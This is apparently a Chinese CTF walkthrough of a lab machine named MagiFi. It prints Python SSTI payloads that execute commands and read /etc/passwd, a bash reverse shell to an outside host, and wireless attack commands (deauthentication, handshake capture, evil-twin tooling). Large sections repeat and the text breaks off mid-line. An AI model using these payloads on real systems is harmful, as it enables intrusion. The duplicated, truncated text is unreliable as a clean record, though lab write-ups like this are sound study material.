![\"image-20250619011206062\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338989.png\")
<\/div>\n
![\"image-20250621130714491\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338991.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Magifi]\n\u2514\u2500$ rustscan -a $IP -- -sCV\nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 3072 0c:c6:d6:24:1e:5b:9e:66:25:0a:ba:0a:08:0b:18:40 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCihzhvruzjUnXRfyh685PiUN5ItFZ\/V0IHymFDih4nSIcKYrhMIw06oKdfeT3zo4tP14xB3ZrjnI3sEFh9R8LV34dTNhH4cNUtbS\/f0h2inMM35dJc533bNxJtT\/znohcEjYgUP3PSCK3dOuP+CcMrW8z+0QJJE9gbw9DqC5hlCzZwBHJgMvNhP74hBD\/JayHiS8G+K2G4owfXRHBs3LhEXYpHEibAHS\/E1G1j9R2wzTLKoN5Y0JKQ+bLxGbJekcnSl2o6hlAarOQnX1I3G+EFgWexJn\/xABxqEWk9B6NLhhPozoTyi43Xc\/omUF6Cw9jFl2v4z7bABMVVPjlXH748C6tFeRzx6\/mqAv2Ok2+Hzf1iessMzvYs1hnZBqL51gwcmBmMoSovm68d2jEKUwVQxEIsFH5lFGQciyM0rfn6EcA0up6iomAhs2fTA8MsOG6WJWd1Sw2nCTNygrmQ8tZfVGYz8rVaH8MkUENct8IxGN1iqel+9Cmdka9DDb+BMVM=\n| 256 9c:c3:1d:ea:22:04:93:b7:81:dd:f2:96:5d:f0:1f:9b (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFAZBwooUDLqSK+kKOx+YVnScFejnY3t0q+D4qt3jCOsjP4dJ8Wf9ORNUbHa7CtlrK3WlqluzuRQsXJ10tvyTw8=\n| 256 55:41:15:90:ff:1d:53:88:e7:65:91:4f:fd:cf:49:85 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGM6WqG9CguoVafo9uhRSPqtZG9yR57PD70\/FKDqba9e\n80\/tcp open http syn-ack ttl 64 Werkzeug httpd 3.0.4 (Python 3.8.10)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Werkzeug\/3.0.4 Python\/3.8.10\n|_http-title: Did not follow redirect to http:\/\/hogwarts.htb\nMAC Address: 08:00:27:1D:E9:1F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Magifi]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.100\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: html,zip,php,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\nError: the server returns a status code that matches the provided options for non existing urls. http:\/\/192.168.10.100\/a37d3a54-77c6-48fc-9438-278d5aef044d => 302 (Length: 225). To continue please exclude the status code or the length<\/code><\/pre>\n\u6ca1\u4e1c\u897f\u554a\uff1f\u770b\u4e00\u4e0b\u6709\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Magifi]\n\u2514\u2500$ curl -s http:\/\/$IP\/ \n<!doctype html>\n<html lang=en>\n<title>Redirecting...<\/title>\n<h1>Redirecting...<\/h1>\n<p>You should be redirected automatically to the target URL: <a href="http:\/\/hogwarts.htb">http:\/\/hogwarts.htb<\/a>. If not, click the link.<\/code><\/pre>\n\u6dfb\u52a0 dns\uff1a<\/p>\n
192.168.10.100 hogwarts.htb<\/code><\/pre>\n\u4f46\u662f\u4fee\u6539\u540e\u8fd8\u662f\u6ca1\u626b\u5230\u4e1c\u897f\u3002\u3002\u3002\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\nhttp:\/\/hogwarts.htb\/<\/code><\/pre>\n![\"image-20250621131955485\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u53ef\u4ee5\u4e0a\u4f20 pdf \u6587\u4ef6\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2a\u7a7a\u6587\u4ef6\u8bd5\u8bd5\uff1a<\/p>\n
<\/div><\/p>\npython SSTI<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528\u7f51\u7ad9\u7ed9\u7684\u6a21\u677f\u3002<\/p>\n
<\/div><\/p>\n\u8fd9\u662f\u4e00\u4efd\u970d\u683c\u6c83\u8328\u5b66\u9662\u7684\u7533\u8bf7\u4e66\uff0c\u5c1d\u8bd5\u8f6c\u4e3apdf<\/code>\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u7f51\u7ad9\u7ec4\u6210\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Magifi]\n\u2514\u2500$ whatweb "http:\/\/hogwarts.htb" \nhttp:\/\/hogwarts.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug\/3.0.4 Python\/3.8.10], IP[192.168.10.100], Python[3.8.10], Title[Hogwarts School], Werkzeug[3.0.4]<\/code><\/pre>\n\u53d1\u73b0\u53ef\u80fd\u662fPython<\/code>\u89e3\u6790\u7684\uff0c\u5c1d\u8bd5SSTI<\/code>\uff1a<\/p>\n\n\u76f8\u5173 payload \u53ef\u4ee5\u53c2\u8003\uff1ahttps:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Server%20Side%20Template%20Injection\/Python\/<\/a><\/p>\n<\/blockquote>\nName: {{7*7}}\nSurname: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}\nAddress: {{ get_flashed_messages.__globals__.__builtins__.open("\/etc\/passwd").read() }}\nBirthday: {{ cycler.__init__.__globals__.os.popen('whoami').read() }}\nPet breed: [Your Pets Breed]\nPet\u2019s Name: [Your Pets Name]<\/code><\/pre>\n\u6ce8\u610f\u5904\u7406\u4e00\u4e0b\u5b57\u4f53\u54e6\uff0c\u548c\u6a21\u677f\u4e00\u81f4\uff01\uff08\u683c\u5f0f\u5237\uff09\u7136\u540e\u5bfc\u51fapdf<\/code>\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<\/div><\/p>\n\u53ef\u4ee5\u8fdb\u884c\u6a21\u677f\u6ce8\u5165\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01\u4f46\u662f\u6211\u8fd9\u8fb9\u6267\u884c\u4e86\u534a\u5929\uff0c\u5c31\u662f\u5f39\u4e0d\u8fc7\u6765\uff0c\u6211\u5728\u6363\u9f13\u65f6\u53d1\u73b0\u4e86\u4e00\u4e2a\u6709\u610f\u601d\u7684\u5730\u65b9\uff0c\u6253\u7a7a\u683c\u6362\u884c\u4ee5\u540e\u51fa\u6765\u7684\u4e0d\u662f\u7a7a\u683c\uff0c\u662f\u4e2a\u83ab\u540d\u5176\u5999\u7684\u5360\u4f4d\u7f6e\u7684\u5730\u65b9\uff0c\u6b64\u65f6\u6309\u5220\u9664\u4f1a\u76f4\u63a5\u5220\u6389\u4e0a\u9762\u7684\u5185\u5bb9\u3002\u3002\u3002\u3002\u6240\u4ee5\u54b1\u4eec\u8981\u5c0f\u5fc3\u3002\u6709\u7a7a\u683c\u7684\u5730\u65b9\u4e0d\u8981\u6362\u884c\uff0c\u5426\u5219\u4f1a\u9ed8\u8ba4\u5c06\u4e0a\u4e0b\u4fe9\u76f4\u63a5\u62fc\u5230\u4e00\u8d77\u4f7f\u547d\u4ee4\u5931\u6548\u3002\u3002\u3002\u3002\u65b9\u6cd5\u5f53\u7136\u662f\u6709\u6ef4\uff0c\u7528\u6362\u884c\u5c06\u547d\u4ee4\u622a\u65ad\u5373\u53ef\u6267\u884c\uff0c\u4f46\u662f\u6a21\u677f\u8bbe\u7f6e\u4e86\uff0c\u5c06\u5355\u8bcd\u653e\u5728\u4e00\u8d77\u4e0d\u88ab\u6362\u884c\u622a\u65ad\u6240\u4ee5\u6211\u4eec\u8981\u4eba\u4e3a\u622a\u65ad\u6389\uff0c\u8fd8\u6ca1\u5230\u6362\u884c\u5c31\u7528\u7a7a\u683c\u586b\u5145\u76f4\u5230\u6362\u884c\u3002\u3002\u3002\u3002<\/p>\n
Birthday: {{ cycler.__init__.__globals__.os.popen('bash -c "bash -i >& \/dev\/tcp\/192.168.10.107\/1234 0>&1"').read() }}<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u65e0\u7ebf\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\uff08\u65b9\u6cd5\u4e00\u524d\u7f6e\u64cd\u4f5c\uff09<\/h3>\n\u4fe1\u606f\u641c\u96c6<\/h4>\n(remote) harry_potter@MagiFi:\/home\/harry_potter\/Hogwarts_web$ cd ~\n(remote) harry_potter@MagiFi:\/home\/harry_potter$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nfwupd-refresh\nsshd\nrubeus.hagrid\nalbus.dumbledore\nminerva.mcgonagall\ntom.riddle\nharry_potter\n(remote) harry_potter@MagiFi:\/home\/harry_potter$ ls -la\ntotal 28\ndrwxr-xr-x 3 harry_potter harry_potter 4096 Feb 4 10:04 .\ndrwxr-xr-x 7 root root 4096 Sep 27 2024 ..\nlrwxrwxrwx 1 root root 9 Sep 27 2024 .bash_history -> \/dev\/null\n-rw-r--r-- 1 harry_potter harry_potter 220 Feb 25 2020 .bash_logout\n-rw-r--r-- 1 harry_potter harry_potter 3771 Feb 25 2020 .bashrc\ndrwxr-xr-x 5 harry_potter harry_potter 4096 Sep 26 2024 Hogwarts_web\n-rw-r--r-- 1 harry_potter harry_potter 807 Feb 25 2020 .profile\n-rw-r--r-- 1 harry_potter harry_potter 43 Feb 4 10:04 user.txt\n(remote) harry_potter@MagiFi:\/home\/harry_potter$ cat user.txt \nhogwarts{ea4bc74f09fb69771165e57b1b215de9}\n(remote) harry_potter@MagiFi:\/home\/harry_potter$ sudo -l\nMatching Defaults entries for harry_potter on MagiFi:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser harry_potter may run the following commands on MagiFi:\n (root) NOPASSWD: \/usr\/sbin\/aireplay-ng, \/usr\/sbin\/airmon-ng, \/usr\/sbin\/airodump-ng, \/usr\/bin\/airdecap-ng, \/usr\/bin\/hostapd-mana<\/code><\/pre>\n\u770b\u4e00\u4e0b\u662f\u4e9b\u5565\u3002\u3002\u3002\u3002\u3002<\/p>\n
\n\u4e00\u3001\/usr\/sbin\/aireplay-ng<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u5c5e\u4e8eAircrack-ng\u5957\u4ef6\uff0c\u7528\u4e8e\u5411\u65e0\u7ebf\u7f51\u7edc\u6ce8\u5165\u6570\u636e\u5305\u4ee5\u751f\u6210\u6d41\u91cf\uff0c\u8f85\u52a9\u7834\u89e3WPA\/WPA2\u5bc6\u94a5\u3002
\n\u200b\u6838\u5fc3\u7528\u9014<\/strong>\u200b\uff1a<\/p>\n\n- \u652f\u6301\u591a\u79cd\u653b\u51fb\u6a21\u5f0f\uff0c\u5982\u89e3\u9664\u8ba4\u8bc1\uff08Deauthentication\uff09\u3001\u4f2a\u9020\u8ba4\u8bc1\uff08Fake Authentication\uff09\u3001ARP\u8bf7\u6c42\u91cd\u653e\u7b49<\/li>\n
- \u901a\u8fc7\u751f\u6210\u6d41\u91cf\u6355\u83b7WPA\u63e1\u624b\u5305\uff0c\u4e3a\u540e\u7eed\u7834\u89e3\u63d0\u4f9b\u6570\u636e\u652f\u6301\u3002<\/li>\n<\/ul>\n
# \u5f3a\u5236\u89e3\u9664\u8ba4\u8bc1\u653b\u51fb\uff08\u4f7f\u5ba2\u6237\u7aef\u65ad\u5f00\u8fde\u63a5\uff09\naireplay-ng -0 10 -a BSSID -c STATION wlan0mon<\/code><\/pre>\n
\n\u4e8c\u3001\/usr\/sbin\/airmon-ng<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u7ba1\u7406\u65e0\u7ebf\u7f51\u5361\u7684\u76d1\u63a7\u6a21\u5f0f\uff08Monitor Mode\uff09\uff0c\u7528\u4e8e\u6355\u83b7\u6240\u6709\u7ecf\u8fc7\u7f51\u5361\u7684\u6570\u636e\u5305\u3002
\n\u200b\u6838\u5fc3\u7528\u9014<\/strong>\u200b\uff1a<\/p>\n\n- \n
\u542f\u52a8\/\u505c\u6b62\u76d1\u63a7\u6a21\u5f0f\uff1aairmon-ng start wlan0<\/code>\u3002<\/p>\n<\/li>\n- \n
\u68c0\u67e5\u5e72\u6270\u8fdb\u7a0b\uff08\u5982\u7f51\u7edc\u7ba1\u7406\u5668\uff09\u5e76\u7ec8\u6b62\uff1a<\/p>\n
airmon-ng check kill<\/code><\/pre>\n\u9002\u7528\u573a\u666f\uff1a\u65e0\u7ebf\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u3001\u6d41\u91cf\u55c5\u63a2\u3002<\/p>\n<\/li>\n<\/ul>\n
\n\u4e09\u3001\/usr\/sbin\/airodump-ng<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u65e0\u7ebf\u7f51\u7edc\u626b\u63cf\u4e0e\u6570\u636e\u5305\u6355\u83b7\u5de5\u5177\uff0c\u5e38\u7528\u4e8e\u8bc6\u522b\u76ee\u6807\u7f51\u7edc\u53ca\u6536\u96c6\u63e1\u624b\u5305\u3002
\n\u200b\u6838\u5fc3\u529f\u80fd<\/strong>\u200b\uff1a<\/p>\n\n- \u5b9e\u65f6\u663e\u793aAP\u7684SSID\u3001BSSID\u3001\u4fe1\u53f7\u5f3a\u5ea6\u3001\u52a0\u5bc6\u65b9\u5f0f\u7b49\u4fe1\u606f<\/li>\n
- \u652f\u6301\u6309\u9891\u9053\u3001BSSID\u8fc7\u6ee4\uff0c\u4f18\u5316\u6570\u636e\u6355\u83b7\u6548\u7387\u3002<\/li>\n<\/ul>\n
# \u9501\u5b9a\u76ee\u6807AP\u5e76\u6355\u83b7\u63e1\u624b\u5305\nairodump-ng --bssid 00:11:22:33:44:55 -c 6 --write capture wlan0mon<\/code><\/pre>\n
\n\u56db\u3001\/usr\/bin\/airdecap-ng<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u89e3\u5bc6WPA\/WPA2\u52a0\u5bc6\u7684\u6355\u83b7\u6587\u4ef6\uff08\u5982.cap<\/code>\u6216.ivs<\/code>\uff09\uff0c\u63d0\u53d6\u660e\u6587\u6d41\u91cf\u3002
\n\u200b\u6838\u5fc3\u7528\u9014<\/strong>\u200b\uff1a<\/p>\n\n- \u9700\u63d0\u4f9b\u76ee\u6807\u7f51\u7edc\u7684ESSID\u548c\u5bc6\u7801\u8fdb\u884c\u89e3\u5bc6\u3002<\/li>\n
- \u652f\u6301\u5265\u79bb\u65e0\u7ebf\u534f\u8bae\u5934\uff0c\u751f\u6210\u7eaf\u6570\u636e\u6587\u4ef6<\/li>\n<\/ul>\n
airdecap-ng -e \"MyNetwork\" -p password123 capture.cap<\/code><\/pre>\n
\n\u4e94\u3001\/usr\/bin\/hostapd-mana<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u6076\u610f\u63a5\u5165\u70b9\uff08Evil Twin\uff09\u5de5\u5177\uff0c\u7528\u4e8e\u521b\u5efa\u4eff\u5192Wi-Fi\u70ed\u70b9\u5b9e\u65bd\u4e2d\u95f4\u4eba\u653b\u51fb\u3002
\n\u200b\u6838\u5fc3\u529f\u80fd<\/strong>\u200b\uff1a<\/p>\n\n- \u7ed3\u5408Karma\u653b\u51fb\uff0c\u81ea\u52a8\u54cd\u5e94\u5ba2\u6237\u7aef\u63a2\u6d4b\u8bf7\u6c42\uff0c\u4f2a\u9020\u5408\u6cd5\u70ed\u70b9<\/li>\n
- \u652f\u6301SSL\u5265\u79bb\uff08SSLstrip\uff09\u3001Cookie\u7a83\u53d6\u7b49\u653b\u51fb\u3002
\n\u200b\u98ce\u9669\u63d0\u793a<\/strong>\u200b\uff1a<\/li>\n- \u9700\u914d\u5408
hostapd<\/code>\u914d\u7f6e\u6587\u4ef6\u53caDHCP\u670d\u52a1\u5b9e\u73b0\u9493\u9c7c\u7f51\u7edc\u3002<\/li>\n- \u53ef\u80fd\u88ab\u7528\u4e8e\u975e\u6cd5\u5165\u4fb5\uff0c\u9700\u4e25\u683c\u6388\u6743\u4f7f\u7528\u3002<\/li>\n<\/ul>\n<\/blockquote>\n
\u770b\u6765\u8fd9\u4e00\u5173\u548c\u7f51\u7edc\u6709\u5173\uff0c\u770b\u4e00\u4e0b\u76f8\u5173\u914d\u7f6e\uff1a<\/p>\n
(remote) harry_potter@MagiFi:\/home\/harry_potter$ ip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1\/128 scope host \n valid_lft forever preferred_lft forever\n2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000\n link\/ether 08:00:27:1d:e9:1f brd ff:ff:ff:ff:ff:ff\n inet 192.168.10.100\/24 brd 192.168.10.255 scope global dynamic enp0s3\n valid_lft 5498sec preferred_lft 5498sec\n inet6 fd00:4c10:d50a:f900:a00:27ff:fe1d:e91f\/64 scope global dynamic mngtmpaddr \n valid_lft 85671sec preferred_lft 13671sec\n inet6 fe80::a00:27ff:fe1d:e91f\/64 scope link \n valid_lft forever preferred_lft forever\n14: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default \n link\/ether 02:42:f2:41:3d:5f brd ff:ff:ff:ff:ff:ff\n inet 172.17.0.1\/16 brd 172.17.255.255 scope global docker0\n valid_lft forever preferred_lft forever\n15: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff\n16: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff\n17: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff\n18: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff\n19: wlan4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff\n20: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:05:00 brd ff:ff:ff:ff:ff:ff\n21: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff\n75: wlan60: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:3c:00 brd ff:ff:ff:ff:ff:ff\n76: hwsim0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ieee802.11\/radiotap 12:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff\n78: veth1@if77: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000\n link\/ether fa:4a:cb:00:bb:8e brd ff:ff:ff:ff:ff:ff link-netnsid 0\n inet 10.200.1.1\/24 scope global veth1\n valid_lft forever preferred_lft forever\n inet6 fe80::f84a:cbff:fe00:bb8e\/64 scope link \n valid_lft forever preferred_lft forever\n80: veth2@if79: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000\n link\/ether f6:01:ca:1d:4f:6e brd ff:ff:ff:ff:ff:ff link-netnsid 1\n inet 10.200.2.1\/24 scope global veth2\n valid_lft forever preferred_lft forever\n inet6 fe80::f401:caff:fe1d:4f6e\/64 scope link \n valid_lft forever preferred_lft forever<\/code><\/pre>\n\u5b58\u5728\u5927\u91cf\u7f51\u5361\u3002\u3002\u3002\u3002\u3002\u4e14\u6709\u4e00\u4e2adocker<\/code>\u7f51\u5361\u3002\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u4f7f\u7528\u65b9\u5f0f<\/p>\n\u4f46\u5c31\u8fd9\u4e48\u770b\u7740\u8fd8\u662f\u4e00\u5934\u96fe\u6c34\uff0c\u770b\u4e00\u4e0b\u6709\u65e0\u76f8\u5173\u8d44\u6599\uff1a<\/p>\n
\nhttps:\/\/github.com\/ricardojoserf\/wifi-pentesting-guide<\/a><\/p>\nhttps:\/\/book.hacktricks.wiki\/en\/generic-methodologies-and-resources\/pentesting-wifi\/index.html<\/a><\/p>\nhttps:\/\/www.netprojnetworks.com\/creating-fake-certificates-hostapd-mana-hostapd\/<\/a><\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Magifi]\n\u2514\u2500$ rustscan -a $IP -- -sCV\nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 3072 0c:c6:d6:24:1e:5b:9e:66:25:0a:ba:0a:08:0b:18:40 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCihzhvruzjUnXRfyh685PiUN5ItFZ\/V0IHymFDih4nSIcKYrhMIw06oKdfeT3zo4tP14xB3ZrjnI3sEFh9R8LV34dTNhH4cNUtbS\/f0h2inMM35dJc533bNxJtT\/znohcEjYgUP3PSCK3dOuP+CcMrW8z+0QJJE9gbw9DqC5hlCzZwBHJgMvNhP74hBD\/JayHiS8G+K2G4owfXRHBs3LhEXYpHEibAHS\/E1G1j9R2wzTLKoN5Y0JKQ+bLxGbJekcnSl2o6hlAarOQnX1I3G+EFgWexJn\/xABxqEWk9B6NLhhPozoTyi43Xc\/omUF6Cw9jFl2v4z7bABMVVPjlXH748C6tFeRzx6\/mqAv2Ok2+Hzf1iessMzvYs1hnZBqL51gwcmBmMoSovm68d2jEKUwVQxEIsFH5lFGQciyM0rfn6EcA0up6iomAhs2fTA8MsOG6WJWd1Sw2nCTNygrmQ8tZfVGYz8rVaH8MkUENct8IxGN1iqel+9Cmdka9DDb+BMVM=\n| 256 9c:c3:1d:ea:22:04:93:b7:81:dd:f2:96:5d:f0:1f:9b (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFAZBwooUDLqSK+kKOx+YVnScFejnY3t0q+D4qt3jCOsjP4dJ8Wf9ORNUbHa7CtlrK3WlqluzuRQsXJ10tvyTw8=\n| 256 55:41:15:90:ff:1d:53:88:e7:65:91:4f:fd:cf:49:85 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGM6WqG9CguoVafo9uhRSPqtZG9yR57PD70\/FKDqba9e\n80\/tcp open http syn-ack ttl 64 Werkzeug httpd 3.0.4 (Python 3.8.10)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Werkzeug\/3.0.4 Python\/3.8.10\n|_http-title: Did not follow redirect to http:\/\/hogwarts.htb\nMAC Address: 08:00:27:1D:E9:1F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Magifi]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.100\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: html,zip,php,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\nError: the server returns a status code that matches the provided options for non existing urls. http:\/\/192.168.10.100\/a37d3a54-77c6-48fc-9438-278d5aef044d => 302 (Length: 225). To continue please exclude the status code or the length<\/code><\/pre>\n\u6ca1\u4e1c\u897f\u554a\uff1f\u770b\u4e00\u4e0b\u6709\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Magifi]\n\u2514\u2500$ curl -s http:\/\/$IP\/ \n<!doctype html>\n<html lang=en>\n<title>Redirecting...<\/title>\n<h1>Redirecting...<\/h1>\n<p>You should be redirected automatically to the target URL: <a href="http:\/\/hogwarts.htb">http:\/\/hogwarts.htb<\/a>. If not, click the link.<\/code><\/pre>\n\u6dfb\u52a0 dns\uff1a<\/p>\n
192.168.10.100 hogwarts.htb<\/code><\/pre>\n\u4f46\u662f\u4fee\u6539\u540e\u8fd8\u662f\u6ca1\u626b\u5230\u4e1c\u897f\u3002\u3002\u3002\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\nhttp:\/\/hogwarts.htb\/<\/code><\/pre>\n<\/div><\/p>\n\u53ef\u4ee5\u4e0a\u4f20 pdf \u6587\u4ef6\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2a\u7a7a\u6587\u4ef6\u8bd5\u8bd5\uff1a<\/p>\n
<\/div><\/p>\npython SSTI<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528\u7f51\u7ad9\u7ed9\u7684\u6a21\u677f\u3002<\/p>\n
<\/div><\/p>\n\u8fd9\u662f\u4e00\u4efd\u970d\u683c\u6c83\u8328\u5b66\u9662\u7684\u7533\u8bf7\u4e66\uff0c\u5c1d\u8bd5\u8f6c\u4e3apdf<\/code>\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u7f51\u7ad9\u7ec4\u6210\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Magifi]\n\u2514\u2500$ whatweb "http:\/\/hogwarts.htb" \nhttp:\/\/hogwarts.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug\/3.0.4 Python\/3.8.10], IP[192.168.10.100], Python[3.8.10], Title[Hogwarts School], Werkzeug[3.0.4]<\/code><\/pre>\n\u53d1\u73b0\u53ef\u80fd\u662fPython<\/code>\u89e3\u6790\u7684\uff0c\u5c1d\u8bd5SSTI<\/code>\uff1a<\/p>\n\n\u76f8\u5173 payload \u53ef\u4ee5\u53c2\u8003\uff1ahttps:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Server%20Side%20Template%20Injection\/Python\/<\/a><\/p>\n<\/blockquote>\nName: {{7*7}}\nSurname: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}\nAddress: {{ get_flashed_messages.__globals__.__builtins__.open("\/etc\/passwd").read() }}\nBirthday: {{ cycler.__init__.__globals__.os.popen('whoami').read() }}\nPet breed: [Your Pets Breed]\nPet\u2019s Name: [Your Pets 